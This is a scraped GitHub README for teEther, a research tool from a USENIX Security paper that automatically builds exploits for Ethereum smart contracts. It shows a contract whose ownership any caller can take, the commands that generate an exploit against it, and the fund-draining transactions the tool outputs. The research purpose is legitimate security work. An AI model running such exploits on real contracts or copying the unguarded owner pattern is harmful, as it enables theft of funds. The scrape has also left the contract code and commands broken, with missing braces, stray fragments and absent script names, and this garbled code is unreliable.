Skip to content
No description, website, or topics provided.
Branch: master
Clone or download
nescio007 fix
fixes #1, thanks @grifball for reporting
Latest commit d7b7fd1 Feb 26, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
teether Initial commit Feb 17, 2019
tests Initial commit Feb 17, 2019
.gitignore Initial commit Feb 17, 2019
LICENSE Initial commit Feb 17, 2019 Initial commit Feb 17, 2019 fix Feb 26, 2019

teEther - Analysis and automatic exploitation framework for Ethereum smart contracts

teEther is an analysis tool for Ethereum smart contracts. It can


  1. Write your vulnerable smart contract
pragma solidity ^0.4.0;

contract Test{

    struct Transaction{
        address to;
        uint amount;

    mapping (bytes32 => Transaction) transactions;

    address owner;
    function set_owner(address new_owner){
        owner = new_owner;
    function new_transaction(address to, uint amount) returns (bytes32){
        bytes32 token = sha3(to, amount);
        Transaction storage t = transactions[token]; = to;
        t.amount += amount;
        return token;
    function approve(bytes32 token){
        require(owner == msg.sender);
        Transaction storage t = transactions[token];;
        delete transactions[token];
  1. Compile your contract
$ solc --bin test.sol | tail -n1 > test.code
  1. Extract the deployed contract code
$ python bin/ test.code > test.contract.code
  1. Generate an exploit
$ python bin/ 0x1234 0x1000 +1000

eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x7cb97b2b0000000000000000000000000000000000000000000000000000000000001000", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x0129ab2700000000000000000000000000000000000000000000000000000000000012340000000000000000000000000000000000000000000000016bc75e2d63100103", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0xa53a1adfce9e2ef9fe2568f35b22f98bb749862a13e0abd291c6ba4967016d629412829d", to:"0x4000000000000000000000000000000000000000", gasPrice:0})


Our paper teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts was published at the 27th USENIX Security Symposium (Usenix Security 18) (slides, video).

          author = {Johannes Krupp and Christian Rossow},
       publisher = {USENIX Association},
       booktitle = {27th USENIX Security Symposium (USENIX Security 18)},
            year = {2018},
           title = {{teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts}},
             url = {},
You can’t perform that action at this time.